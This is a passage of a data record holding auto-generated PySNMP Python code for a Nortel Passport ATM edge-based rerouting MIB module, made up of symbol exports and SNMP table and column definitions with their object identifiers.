mscAtmIfVptPnniEbrIneligibleRecoveredConnections=\n mscAtmIfVptPnniEbrIneligibleRecoveredConnections,\n mscAtmIfVpcEbrInfoConnectionRecovered=\n mscAtmIfVpcEbrInfoConnectionRecovered, mscAtmIfVccSrcEbrOvProvTable=\n mscAtmIfVccSrcEbrOvProvTable, mscAtmIfVccEbrInfoRowStatusTable=\n mscAtmIfVccEbrInfoRowStatusTable, mscAtmIfVccEbrInfoStorageType=\n mscAtmIfVccEbrInfoStorageType, mscAtmIfVpcEbrInfoTotalPathOptimizations\n =mscAtmIfVpcEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbr=\n mscAtmIfVptIispEbr, mscAtmIfVpcEbrInfoRowStatus=\n mscAtmIfVpcEbrInfoRowStatus, mscAtmIfVccSrcEbrOvRowStatusTable=\n mscAtmIfVccSrcEbrOvRowStatusTable, mscAtmIfIispEbrConnectionRecovery=\n mscAtmIfIispEbrConnectionRecovery, mscAtmIfVccSrcEbrOvProvEntry=\n mscAtmIfVccSrcEbrOvProvEntry, mscAtmIfUniEbrIndex=mscAtmIfUniEbrIndex,\n mscAtmIfVptUniEbrTotalConnectionRecoveries=\n mscAtmIfVptUniEbrTotalConnectionRecoveries,\n mscAtmIfVpcEbrInfoTotalConnectionRecoveries=\n mscAtmIfVpcEbrInfoTotalConnectionRecoveries,\n mscAtmIfVptVccSrcEbrOvRowStatusEntry=\n mscAtmIfVptVccSrcEbrOvRowStatusEntry,\n mscAtmIfIispEbrTotalConnectionRecoveries=\n mscAtmIfIispEbrTotalConnectionRecoveries, mscAtmIfIispEbrRowStatus=\n mscAtmIfIispEbrRowStatus, mscAtmIfVpcSrcEbrOvProvTable=\n mscAtmIfVpcSrcEbrOvProvTable, mscAtmIfVptUniEbrRowStatus=\n mscAtmIfVptUniEbrRowStatus, mscAtmIfPnniEbrRowStatusTable=\n mscAtmIfPnniEbrRowStatusTable, mscAtmIfPnniEbrStatsEntry=\n mscAtmIfPnniEbrStatsEntry, mscAtmIfVpcSrcEbrOvIndex=\n mscAtmIfVpcSrcEbrOvIndex, mscAtmIfVpcEbrInfoComponentName=\n mscAtmIfVpcEbrInfoComponentName, mscAtmIfVptIispEbrPathOptimization=\n mscAtmIfVptIispEbrPathOptimization, mscAtmIfVpcSrcEbrOvRowStatus=\n mscAtmIfVpcSrcEbrOvRowStatus, mscAtmIfVpcEbrInfoRowStatusEntry=\n mscAtmIfVpcEbrInfoRowStatusEntry, mscAtmIfVptPnniEbrOperEntry=\n mscAtmIfVptPnniEbrOperEntry, mscAtmIfIispEbrSubscribedConnections=\n mscAtmIfIispEbrSubscribedConnections, mscAtmIfVccSrcEbrOv=\n mscAtmIfVccSrcEbrOv, 
mscAtmIfVptIispEbrEligibleRecoveredConnections=\n mscAtmIfVptIispEbrEligibleRecoveredConnections, mscAtmIfUniEbrProvEntry\n =mscAtmIfUniEbrProvEntry, mscAtmIfVpcEbrInfoRowStatusTable=\n mscAtmIfVpcEbrInfoRowStatusTable, mscAtmIfVptPnniEbrComponentName=\n mscAtmIfVptPnniEbrComponentName, mscAtmIfVptPnniEbrConnectionRecovery=\n mscAtmIfVptPnniEbrConnectionRecovery, mscAtmIfVptVccSrcEbrOvRowStatus=\n mscAtmIfVptVccSrcEbrOvRowStatus, mscAtmIfVptIispEbrRowStatusTable=\n mscAtmIfVptIispEbrRowStatusTable, mscAtmIfVptPnniEbrStorageType=\n mscAtmIfVptPnniEbrStorageType, mscAtmIfVptVccEbrInfoStorageType=\n mscAtmIfVptVccEbrInfoStorageType, mscAtmIfIispEbr=mscAtmIfIispEbr,\n mscAtmIfVccEbrInfoOperEntry=mscAtmIfVccEbrInfoOperEntry,\n mscAtmIfVptPnniEbrTotalConnectionRecoveries=\n mscAtmIfVptPnniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrRowStatus=\n mscAtmIfPnniEbrRowStatus, mscAtmIfVpcSrcEbrOvProvEntry=\n mscAtmIfVpcSrcEbrOvProvEntry, mscAtmIfVccEbrInfoRowStatus=\n mscAtmIfVccEbrInfoRowStatus, mscAtmIfVptIispEbrIndex=\n mscAtmIfVptIispEbrIndex, mscAtmIfVpcEbrInfoOperEntry=\n mscAtmIfVpcEbrInfoOperEntry, mscAtmIfVptIispEbrOperTable=\n mscAtmIfVptIispEbrOperTable, mscAtmIfUniEbrProvTable=\n mscAtmIfUniEbrProvTable, mscAtmIfPnniEbrPathOptimization=\n mscAtmIfPnniEbrPathOptimization, mscAtmIfVpcEbrInfoStatsTable=\n mscAtmIfVpcEbrInfoStatsTable, mscAtmIfVccSrcEbrOvIndex=\n mscAtmIfVccSrcEbrOvIndex, mscAtmIfPnniEbrSubscribedConnections=\n mscAtmIfPnniEbrSubscribedConnections, mscAtmIfVptIispEbrRowStatusEntry=\n mscAtmIfVptIispEbrRowStatusEntry, mscAtmIfIispEbrProvTable=\n mscAtmIfIispEbrProvTable, mscAtmIfVptVccSrcEbrOvComponentName=\n mscAtmIfVptVccSrcEbrOvComponentName,\n mscAtmIfVptUniEbrConnectionRecovery=mscAtmIfVptUniEbrConnectionRecovery,\n mscAtmIfVccSrcEbrOvStorageType=mscAtmIfVccSrcEbrOvStorageType,\n mscAtmIfVpcSrcEbrOv=mscAtmIfVpcSrcEbrOv,\n mscAtmIfVptPnniEbrRowStatusTable=mscAtmIfVptPnniEbrRowStatusTable,\n mscAtmIfUniEbrEligibleRecoveredConnections=\n 
mscAtmIfUniEbrEligibleRecoveredConnections,\n mscAtmIfVptUniEbrRowStatusEntry=mscAtmIfVptUniEbrRowStatusEntry,\n mscAtmIfVccSrcEbrOvRowStatus=mscAtmIfVccSrcEbrOvRowStatus,\n mscAtmIfIispEbrEligibleRecoveredConnections=\n mscAtmIfIispEbrEligibleRecoveredConnections, mscAtmIfPnniEbrOperTable=\n mscAtmIfPnniEbrOperTable, mscAtmIfVpcEbrInfoOperTable=\n mscAtmIfVpcEbrInfoOperTable, mscAtmIfVpcEbrInfoStatsEntry=\n mscAtmIfVpcEbrInfoStatsEntry, mscAtmIfVptUniEbrStorageType=\n mscAtmIfVptUniEbrStorageType, mscAtmIfVccEbrInfoStatsTable=\n mscAtmIfVccEbrInfoStatsTable, mscAtmIfVptVccEbrInfoStatsTable=\n mscAtmIfVptVccEbrInfoStatsTable, mscAtmIfUniEbrPathOptimization=\n mscAtmIfUniEbrPathOptimization, mscAtmIfVptPnniEbrStatsTable=\n mscAtmIfVptPnniEbrStatsTable, mscAtmIfVptUniEbrSubscribedConnections=\n mscAtmIfVptUniEbrSubscribedConnections, mscAtmIfVptVccEbrInfo=\n mscAtmIfVptVccEbrInfo, mscAtmIfPnniEbrConnectionRecovery=\n mscAtmIfPnniEbrConnectionRecovery,\n mscAtmIfVccEbrInfoConnectionRecovered=\n mscAtmIfVccEbrInfoConnectionRecovered, mscAtmIfVccEbrInfoStatsEntry=\n mscAtmIfVccEbrInfoStatsEntry,\n mscAtmIfVptVccEbrInfoTotalConnectionRecoveries=\n mscAtmIfVptVccEbrInfoTotalConnectionRecoveries,\n mscAtmIfUniEbrStorageType=mscAtmIfUniEbrStorageType,\n mscAtmIfVptUniEbrStatsEntry=mscAtmIfVptUniEbrStatsEntry,\n mscAtmIfVptPnniEbrProvTable=mscAtmIfVptPnniEbrProvTable,\n mscAtmIfVccSrcEbrOvRecoverySubscribed=\n mscAtmIfVccSrcEbrOvRecoverySubscribed, atmEbrCapabilities=\n atmEbrCapabilities, mscAtmIfUniEbrComponentName=\n mscAtmIfUniEbrComponentName, mscAtmIfPnniEbrTotalPathOptimizations=\n mscAtmIfPnniEbrTotalPathOptimizations,\n mscAtmIfUniEbrIneligibleRecoveredConnections=\n mscAtmIfUniEbrIneligibleRecoveredConnections, mscAtmIfPnniEbr=\n mscAtmIfPnniEbr, mscAtmIfVptIispEbrProvEntry=\n mscAtmIfVptIispEbrProvEntry, mscAtmIfUniEbrRowStatusEntry=\n mscAtmIfUniEbrRowStatusEntry, mscAtmIfVptPnniEbrRowStatusEntry=\n mscAtmIfVptPnniEbrRowStatusEntry, mscAtmIfVpcEbrInfoIndex=\n 
mscAtmIfVpcEbrInfoIndex, mscAtmIfVptVccSrcEbrOvProvEntry=\n mscAtmIfVptVccSrcEbrOvProvEntry, mscAtmIfVccEbrInfoOperTable=\n mscAtmIfVccEbrInfoOperTable, mscAtmIfVptVccEbrInfoStatsEntry=\n mscAtmIfVptVccEbrInfoStatsEntry, atmEbrGroupCA02A=atmEbrGroupCA02A,\n mscAtmIfVccEbrInfoOptimizationSubscribed=\n mscAtmIfVccEbrInfoOptimizationSubscribed,\n mscAtmIfVptVccSrcEbrOvRowStatusTable=\n mscAtmIfVptVccSrcEbrOvRowStatusTable, atmEbrMIB=atmEbrMIB,\n mscAtmIfVptVccEbrInfoRecoverySubscribed=\n mscAtmIfVptVccEbrInfoRecoverySubscribed,\n mscAtmIfVpcSrcEbrOvRowStatusEntry=mscAtmIfVpcSrcEbrOvRowStatusEntry,\n mscAtmIfVptVccEbrInfoRowStatus=mscAtmIfVptVccEbrInfoRowStatus,\n mscAtmIfVptIispEbrStatsEntry=mscAtmIfVptIispEbrStatsEntry,\n mscAtmIfPnniEbrStorageType=mscAtmIfPnniEbrStorageType,\n mscAtmIfPnniEbrProvEntry=mscAtmIfPnniEbrProvEntry,\n mscAtmIfVptUniEbrOperTable=mscAtmIfVptUniEbrOperTable,\n mscAtmIfIispEbrIneligibleRecoveredConnections=\n mscAtmIfIispEbrIneligibleRecoveredConnections,\n mscAtmIfVptIispEbrConnectionRecovery=\n mscAtmIfVptIispEbrConnectionRecovery, mscAtmIfVptUniEbr=\n mscAtmIfVptUniEbr, atmEbrGroupCA02=atmEbrGroupCA02,\n mscAtmIfVptIispEbrTotalConnectionRecoveries=\n mscAtmIfVptIispEbrTotalConnectionRecoveries,\n mscAtmIfUniEbrTotalPathOptimizations=\n mscAtmIfUniEbrTotalPathOptimizations,\n mscAtmIfVpcSrcEbrOvRecoverySubscribed=\n mscAtmIfVpcSrcEbrOvRecoverySubscribed, mscAtmIfVptPnniEbrOperTable=\n mscAtmIfVptPnniEbrOperTable,\n mscAtmIfVptVccSrcEbrOvOptimizationSubscribed=\n mscAtmIfVptVccSrcEbrOvOptimizationSubscribed,\n mscAtmIfVptUniEbrEligibleRecoveredConnections=\n mscAtmIfVptUniEbrEligibleRecoveredConnections,\n mscAtmIfVpcEbrInfoOptimizationSubscribed=\n mscAtmIfVpcEbrInfoOptimizationSubscribed, mscAtmIfVptPnniEbrIndex=\n mscAtmIfVptPnniEbrIndex, mscAtmIfUniEbrRowStatus=\n mscAtmIfUniEbrRowStatus, mscAtmIfUniEbrOperEntry=\n mscAtmIfUniEbrOperEntry, mscAtmIfVptVccSrcEbrOvStorageType=\n mscAtmIfVptVccSrcEbrOvStorageType,\n 
mscAtmIfVptPnniEbrTotalPathOptimizations=\n mscAtmIfVptPnniEbrTotalPathOptimizations,\n mscAtmIfVpcSrcEbrOvComponentName=mscAtmIfVpcSrcEbrOvComponentName,\n mscAtmIfVptVccEbrInfoComponentName=mscAtmIfVptVccEbrInfoComponentName,\n mscAtmIfIispEbrOperEntry=mscAtmIfIispEbrOperEntry,\n mscAtmIfVptVccSrcEbrOvRecoverySubscribed=\n mscAtmIfVptVccSrcEbrOvRecoverySubscribed, mscAtmIfIispEbrIndex=\n mscAtmIfIispEbrIndex, atmEbrCapabilitiesCA=atmEbrCapabilitiesCA,\n mscAtmIfVccEbrInfoTotalConnectionRecoveries=\n mscAtmIfVccEbrInfoTotalConnectionRecoveries)\n",
"step-4": "#\n# PySNMP MIB module Nortel-MsCarrier-MscPassport-AtmEbrMIB (http://snmplabs.com/pysmi)\n# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Nortel-MsCarrier-MscPassport-AtmEbrMIB\n# Produced by pysmi-0.3.4 at Mon Apr 29 20:19:41 2019\n# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4\n# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) \n#\nInteger, ObjectIdentifier, OctetString = mibBuilder.importSymbols(\"ASN1\", \"Integer\", \"ObjectIdentifier\", \"OctetString\")\nNamedValues, = mibBuilder.importSymbols(\"ASN1-ENUMERATION\", \"NamedValues\")\nValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols(\"ASN1-REFINEMENT\", \"ValueRangeConstraint\", \"SingleValueConstraint\", \"ValueSizeConstraint\", \"ConstraintsUnion\", \"ConstraintsIntersection\")\nmscAtmIfIndex, mscAtmIfVptIndex, mscAtmIfVcc, mscAtmIfVptVccIndex, mscAtmIfVpc, mscAtmIfVptVcc, mscAtmIfVccIndex, mscAtmIfVpcIndex = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\", \"mscAtmIfVptIndex\", \"mscAtmIfVcc\", \"mscAtmIfVptVccIndex\", \"mscAtmIfVpc\", \"mscAtmIfVptVcc\", \"mscAtmIfVccIndex\", \"mscAtmIfVpcIndex\")\nmscAtmIfIisp, mscAtmIfVptIisp, mscAtmIfVptIispIndex, mscAtmIfIispIndex = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfIisp\", \"mscAtmIfVptIisp\", \"mscAtmIfVptIispIndex\", \"mscAtmIfIispIndex\")\nmscAtmIfVpcSrc, mscAtmIfVptVccSrcIndex, mscAtmIfVccSrcIndex, mscAtmIfVptVccSrc, mscAtmIfVpcSrcIndex, mscAtmIfVccSrc = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-AtmNetworkingMIB\", \"mscAtmIfVpcSrc\", \"mscAtmIfVptVccSrcIndex\", \"mscAtmIfVccSrcIndex\", \"mscAtmIfVptVccSrc\", \"mscAtmIfVpcSrcIndex\", \"mscAtmIfVccSrc\")\nmscAtmIfVptPnniIndex, mscAtmIfPnniIndex, mscAtmIfPnni, mscAtmIfVptPnni = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", 
\"mscAtmIfVptPnniIndex\", \"mscAtmIfPnniIndex\", \"mscAtmIfPnni\", \"mscAtmIfVptPnni\")\nmscAtmIfVptUni, mscAtmIfUni, mscAtmIfUniIndex, mscAtmIfVptUniIndex = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfVptUni\", \"mscAtmIfUni\", \"mscAtmIfUniIndex\", \"mscAtmIfVptUniIndex\")\nCounter32, DisplayString, Gauge32, StorageType, RowStatus = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-StandardTextualConventionsMIB\", \"Counter32\", \"DisplayString\", \"Gauge32\", \"StorageType\", \"RowStatus\")\nNonReplicated, = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-TextualConventionsMIB\", \"NonReplicated\")\nmscPassportMIBs, = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-UsefulDefinitionsMIB\", \"mscPassportMIBs\")\nNotificationGroup, ModuleCompliance = mibBuilder.importSymbols(\"SNMPv2-CONF\", \"NotificationGroup\", \"ModuleCompliance\")\nInteger32, ObjectIdentity, ModuleIdentity, Bits, Counter32, IpAddress, Gauge32, NotificationType, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, Unsigned32, Counter64, TimeTicks = mibBuilder.importSymbols(\"SNMPv2-SMI\", \"Integer32\", \"ObjectIdentity\", \"ModuleIdentity\", \"Bits\", \"Counter32\", \"IpAddress\", \"Gauge32\", \"NotificationType\", \"iso\", \"MibScalar\", \"MibTable\", \"MibTableRow\", \"MibTableColumn\", \"MibIdentifier\", \"Unsigned32\", \"Counter64\", \"TimeTicks\")\nTextualConvention, DisplayString = mibBuilder.importSymbols(\"SNMPv2-TC\", \"TextualConvention\", \"DisplayString\")\natmEbrMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159))\nmscAtmIfVpcSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2))\nmscAtmIfVpcSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1), )\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatusTable.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1), ).setIndexNames((0, 
\"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVpcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmNetworkingMIB\", \"mscAtmIfVpcSrcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVpcSrcEbrOvIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatusEntry.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatus.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvComponentName.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvStorageType.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvIndex.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20), )\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvProvTable.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVpcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmNetworkingMIB\", \"mscAtmIfVpcSrcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVpcSrcEbrOvIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvProvEntry.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 
4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1))).clone('yes')).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1))).clone('yes')).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVpcEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11))\nmscAtmIfVpcEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1), )\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatusTable.setStatus('mandatory')\nmscAtmIfVpcEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVpcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVpcEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatusEntry.setStatus('mandatory')\nmscAtmIfVpcEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 1), RowStatus()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatus.setStatus('mandatory')\nmscAtmIfVpcEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoComponentName.setStatus('mandatory')\nmscAtmIfVpcEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif 
mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStorageType.setStatus('mandatory')\nmscAtmIfVpcEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoIndex.setStatus('mandatory')\nmscAtmIfVpcEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30), )\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOperTable.setStatus('mandatory')\nmscAtmIfVpcEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVpcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVpcEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOperEntry.setStatus('mandatory')\nmscAtmIfVpcEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVpcEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVpcEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoConnectionRecovered.setStatus('mandatory')\nmscAtmIfVpcEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 
1, 562, 36, 2, 1, 114, 4, 11, 40), )\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStatsTable.setStatus('mandatory')\nmscAtmIfVpcEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVpcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVpcEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStatsEntry.setStatus('mandatory')\nmscAtmIfVpcEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVpcEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2))\nmscAtmIfVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1), )\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatusTable.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmNetworkingMIB\", \"mscAtmIfVccSrcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVccSrcEbrOvIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatusEntry.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: 
mscAtmIfVccSrcEbrOvRowStatus.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvComponentName.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvStorageType.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvIndex.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20), )\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvProvTable.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmNetworkingMIB\", \"mscAtmIfVccSrcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVccSrcEbrOvIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvProvEntry.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1))).clone('yes')).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 